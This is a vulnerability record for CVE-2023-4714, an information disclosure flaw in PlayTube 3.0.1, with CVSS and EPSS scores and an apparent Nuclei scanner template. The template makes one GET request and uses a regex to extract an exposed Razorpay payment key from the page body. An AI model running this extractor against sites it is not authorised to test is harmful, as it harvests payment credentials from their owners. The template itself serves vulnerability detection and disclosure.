CVSS2: 4 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.605 Medium
Percentile: 97.8%

A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
id: CVE-2023-4714
info:
  name: PlayTube 3.0.1 - Information Disclosure
  author: Farish
  severity: high
  description: |
    A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4714
    - https://www.exploitalert.com/view-details.html?id=39826
    - https://vuldb.com/?ctiid.238577
    - https://vuldb.com/?id.238577
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4714
    cwe-id: CWE-200
    epss-score: 0.68074
    epss-percentile: 0.97962
    cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: playtube
    product: playtube
  tags: cve2023,cve,playtube,exposure
http:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "razorpay_options"
          - "PlayTube"
          - "key:"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - 'key: "([a-z_A-Z0-9]+)"'
# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950